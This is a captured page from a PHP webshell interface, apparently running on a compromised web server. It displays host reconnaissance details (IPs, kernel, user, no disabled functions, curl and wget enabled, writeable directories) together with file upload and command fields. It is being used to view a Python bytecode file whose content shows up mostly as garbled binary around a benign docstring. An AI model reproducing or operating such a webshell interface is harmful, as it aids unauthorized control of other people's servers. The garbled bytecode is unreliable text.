403Webshell
Server IP : 217.160.0.135  /  Your IP : 216.73.217.85
Web Server : Apache
System : Linux www 6.18.52-i1-ampere #1203 SMP Mon Sep 14 18:29:59 CEST 2026 aarch64
User : sws1074145052 ( 1074145052)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/lib/python3/dist-packages/traitlets/utils/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib/python3/dist-packages/traitlets/utils/__pycache__/nested_update.cpython-311.pyc
�

�Uc����d�ZdS)c�@�|���D]e\}}t|t��r<||vr7t||t��rt||||���V||vr||||<�f|���D]\}}||vr|||<�|S)a�Merge two nested dictionaries.

    Effectively a recursive ``dict.update``.

    Examples
    --------
    Merge two flat dictionaries:
    >>> nested_update(
    ...     {'a': 1, 'b': 2},
    ...     {'b': 3, 'c': 4}
    ... )
    {'a': 1, 'b': 3, 'c': 4}

    Merge two nested dictionaries:
    >>> nested_update(
    ...     {'x': {'a': 1, 'b': 2}, 'y': 5, 'z': 6},
    ...     {'x': {'b': 3, 'c': 4}, 'z': 7, '0': 8},
    ... )
    {'x': {'a': 1, 'b': 3, 'c': 4}, 'y': 5, 'z': 7, '0': 8}

    )�items�
isinstance�dict�
nested_update)�this�that�key�values    �?/usr/lib/python3/dist-packages/traitlets/utils/nested_update.pyrrs���,�j�j�l�l�"�"�
��U��e�T�"�"�	"��d�{�{�z�$�s�)�T�:�:�{��d�3�i��c��3�3�3��
�D�[�[��S�	�D��I���j�j�l�l���
��U��d�?�?��D��I���K�N)r�rr�<module>rs��
!�!�!�!�!r

Youez - 2016 - github.com/yon3zu
LinuXploit